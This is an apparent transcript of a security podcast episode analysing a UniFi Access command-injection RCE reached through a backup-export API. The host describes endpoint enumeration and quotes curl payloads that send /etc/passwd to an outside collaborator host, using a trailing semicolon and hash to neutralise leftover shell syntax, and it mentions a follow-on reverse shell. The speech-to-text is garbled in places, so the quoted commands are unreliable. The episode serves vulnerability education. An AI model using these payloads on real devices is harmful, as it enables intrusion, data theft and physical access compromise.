Welcome back to Vuln Vibes. In this episode, we are going to talk about UniFi OS RCE. Our mission today is a real deep dive into CVE 2025-52665. This is a critical remote code execution vulnerability discovered in UniFi Access.
And definitely not your run-of-the-mill RCE.
No, exactly. This wasn't just about finding an argument injection point. It really required some finesse, a deeper understanding of shell mechanics to handle the underlying syntax issues.
And the payoff reflected that complexity. We're talking about the path that led to a $25,000 bounty.
That's the one. And that price tag really signals the severity, doesn't it?
Absolutely, because for you folks dealing with perimeter security, zero-day analysis, this is more than just code execution on a box. We're looking at how threat actors could bridge right into the UniFi Access environment.
Which means physical security.
Directly. Gaining control over door systems, NFC credential management. It takes the compromise from the server room right to the front door. Systemic risk.
Okay, so let's unpack how they got there. Starting with reconnaissance. How did they even find the vulnerable spot?
Well, it began pretty methodically. Standard internal network enumeration.
Targeting the usual suspect, like 192.168.1.1.
Pretty much. Just systematically mapping out every open TCP port on that internal gateway IP.
But they weren't just randomly poking around, right? They had an idea what they were looking for.
Yeah, they were specifically hunting for administrative or utility endpoints. So they set up a loop, probing specifically for one path. APU core backup export. Backup function, always a juicy target.
Exactly. It smells like file system interaction, maybe running external commands, prime territory for injection research.
And this is where things got interesting, wasn't it? The responses they got back.
This was the critical clue. Most ports just gave back the expected 404 not found. The path didn't exist there.
Standard stuff.
But one port, port 9780, responded differently. Came back with a 405 method not allowed.
Okay, so not a 404. That's significant. It's huge. A 405 basically tells you three things right away. One, the URL path APU core backup export is valid on this port. Two, there's a handler actually listening there.
And three,
you're just using the wrong HTTP verb. The method isn't allowed if you're enumerating with GEID requests, which is common.
It strongly suggests you should try a POST instead.
Precisely. That 405 saves you potentially hours of fuzzing verbs or parameters. It tells you the door's there, you just need the right key, which is probably POST in this case.
So that let them zero in port 9780 using a POST request?
Right. They switched their technical setup, confirmed they were using POST, and importantly, made sure to set the content type header to application JSON.
Why JSON specifically?
Because they likely looked at the client-side code, or maybe just guessed based on modern API practices. In this case, it mirrored the data structure expected by the backend code, probably found in a file like service.js or similar. You need to speak the API's language.
Smart reconnaissance paying off. That 405 was the thread they needed to pull.
Definitely. See a 405 on a utility endpoint like backup, you're probably 90% of the way to figuring out how to talk to it correctly.
All right, let's move to the next stage. The command injection attempt. This is where, the real technical meat of this case study lies for our audience. This is where the standard playbook hits a wall.
So they crafted what looks like a pretty standard minimal command injection payload, just trying to prove execution right. Simple data exfil.
Yeah, the textbook first shot, something easy to verify. The payload they used was dir tmp catchify lab. curl LFS data binary at etc past wd http.test.ostify.com. Makes sense. The dir parameter seems like the injection point. Use a semicolon to break out of the intended command.
And then execute curl to grab etc past rub and POST to their listener, test.ostify.com. Simple, should work.
Should work. But it didn't.
Right. Nothing. No callback received at their collaborator service. Silent.
And that's the puzzle.
Yeah.
The semicolon should have terminated the previous command and allowed curl to run, so why did it fail? Why? No phone home. This is the core issue, the trap, as we called it. The problem wasn't the initial injection syntax itself. It was what the backup script did next.
The context of execution.
Exactly. The vulnerability exists because this export routine runs more shell commands after it uses the directory path you provide in the dir argument.
Stuff related to the backup process itself.
Yeah, things like mtemp to create temporary files, shanod to set permissions, tar to archive, do-nas to check the size, all chained together, potentially on the same command line that included the user's dir input.
Okay, I see where this is going. So your injected curl command executes.
Maybe it even starts to execute.
Right. But immediately after the curl command finishes, or maybe even while it's trying to run, the shell interpreter looks at the rest of the original command line.
And it sees junk. Leftover syntax.
Essentially, yes.
Yeah.
It sees the remnants, the arguments that were supposed to go to mtemp or tar or whatever came next in the original script, but now they're sitting right after your semicolon and your curl command.
And the shell tries to interpret that as the next command.
Exactly. And it's syntactically invalid. It doesn't make sense in that position. So the shell throws a parse error, or maybe a path error, trying to find a command named after some fragment of a path.
So the whole process crashes before the curl command can properly complete its network operation, like flushing the buffer and sending the data.
Precisely. The injection works, but the cleanup, or rather the lack of cleanup for the residual syntax, breaks the execution chain. The original script structure interferes with the injected command's success.
It's like tripping over your own feet after you've already broken down the door. The residual syntax is the trip hazard.
That's a good way to put it. You didn't just need to inject. You needed to handle the environment after your injection point, manage the rest of the command line.
You have to clean up the crime scene, basically, or the original script logic ruins your exploit.
Couldn't have said it better. Which leads us neatly to how they did achieve clean execution.
Right, the elegant fix. This is where understanding shell parsing really shines. They needed to ensure their injected command finished cleanly and deal with all those leftover bits.
Neutralize the residual tokens, as you said.
And the fix was surprisingly simple once you understand the mechanics, just a couple of extra characters at the end of the payload.
Super smart. It leveraged a fundamental shell feature. So the payload that actually worked, the one that got them RCE and presumably that bounty, was dear TMP catchify, curl -data binary at etcetipaswdhttp.test.ostify.com, hashtag. See those last two characters, the semicolon and the hash mark, hashtag. That's the magic.
Let's break that down because this is key for anyone listening who deals with shell injection. The semicolon first.
Okay, the semicolon was pretty standard. It's a command separator. It cleanly terminates the curl command, tells the shell, okay, that command is done.
But just the semicolon wasn't enough, right? Because you still have those leftover mktem arguments or whatever following it.
Exactly. If they stopped at the semicolon, the shell would finish the curl, then still try to parse the residual junk and likely crash again.
So the real genius was adding the hashtag.
Precisely. In shell scripting, the hash mark signifies the beginning of a comment. Everything from the hashtag to the end of the line is ignored by the shell interpreter.
So it effectively just deletes the rest of the original command line.
It tells the shell to completely disregard it. All those problematic residual tokens for mtemp, chad, tar, they become part of a comment. They're never parsed as commands.
So the curl command runs, it's terminated cleanly by the semicolon, and then the hash ensures nothing after it can cause a syntax error.
Bingo. Clean execution environment. The curl command gets the space it needs to run, complete its network request, and phone home without the shell crashing underneath it.
Elegant. And the results confirmed it worked.
Immediately. The collaborator lit up with an incoming HTTP POST request from the target device.
Containing the contents of etc.?
Yep, beta exfiltration confirmed. And once you have reliable command execution like that,
you pivot to a full shell.
Standard procedure. They likely used a common reverse shell payload next, sent that using the same vulnerability and hashtag technique, and bam, interactive shell access popped back. Full compromise.
Total control. Wow. Okay, so stepping back from the pure technical cleverness of the hashtag trick, what's the broader impact here? Why is this vulnerability particularly nasty?
Well, the context is critical infrastructure, essentially. UniFi Access isn't just some web app. It controls physical access, doors, credentials.
Right, you mentioned the NFC cards and door controls.
So getting RCE on this appliance isn't just about stealing data, though you could certainly do that. It's about potentially manipulating the physical security layer. Imagine an attacker remotely unlocking doors, adding unauthorized NFC credentials, disabling access logs.
That's a completely different level of threat, moving from cyber to physical instantly.
It bridges that gap, which is why vulnerabilities in these kinds of physical access control systems are taken so seriously, hence the large bounty.
Makes sense. And the fix. How did McQuitty address this?
Thankfully, they did patch it. The remediation was to update to UniFi Access version 4.0.21. That version specifically includes the fix for this vulnerable backup workflow. So the usual advice applies. Patch promptly, especially for these kinds of embedded or edge devices controlling critical functions. Absolutely crucial. These devices often sit on sensitive network segments and aren't always managed with the same rigor as, say, primary servers.
So for the security pros listening, why did we spend so much time on just two characters, the semicolon and the hash? Why does this level of nuance matter?
Because this is the level where advanced exploitation happens now. We're past the easy wins of simple argument injection in many cases. Understanding the deeper shell mechanics, how scripts handle input, what happens after your injection point, dealing with residual syntax is often the difference.
It's the difference between a theoretical vuln and a practical exploit.
Exactly. It's the difference between a finding that gets marked as low impact and one that gets you full RCE and a significant payout. That precision, understanding things like comment characters, hashtag or background operators, or conditional execution and whatever, and when to use them, is vital for anyone doing serious vulnerability research or exploit development.
It elevates the game beyond just finding the input field.
You have to understand the environment your input lands in.
Yeah.
Okay, great summary. So the key steps again were that focused enumeration, recognizing the importance of the 405 method not allowed clue, identifying the hidden trap of those residual shell tokens left over from the original script, and finally, the elegant solution, using the semicolon for clean termination and critically, the hashtag character, to neutralize the rest of the command line, commenting out the problematic syntax. A fantastic case study in shell injection nuances.
It really makes you think, doesn't it? If a seemingly simple administrative utility, just a backup export function, can become such a potent RCE vector because of subtle shell parsing issues, where else is this hiding?
How many other maintenance scripts, utility endpoints, maybe even internal APIs, have developers built without fully considering how the shell will interpret concatenated commands or handle unexpected input termination?
Especially in embedded systems or IoT devices where maybe shell scripting is used heavily for core functions, it feels like fertile ground.
It often is. Those overlooked, seemingly boring utility functions can sometimes be the weakest link.
A challenging thought to end on. Thanks for walking us through that complex exploit path.
My pleasure. Always good to dissect these kinds of attacks.
And for everyone listening, until next time, keep scrutinizing those scripts, pay attention to the shell environment, and stay vigilant.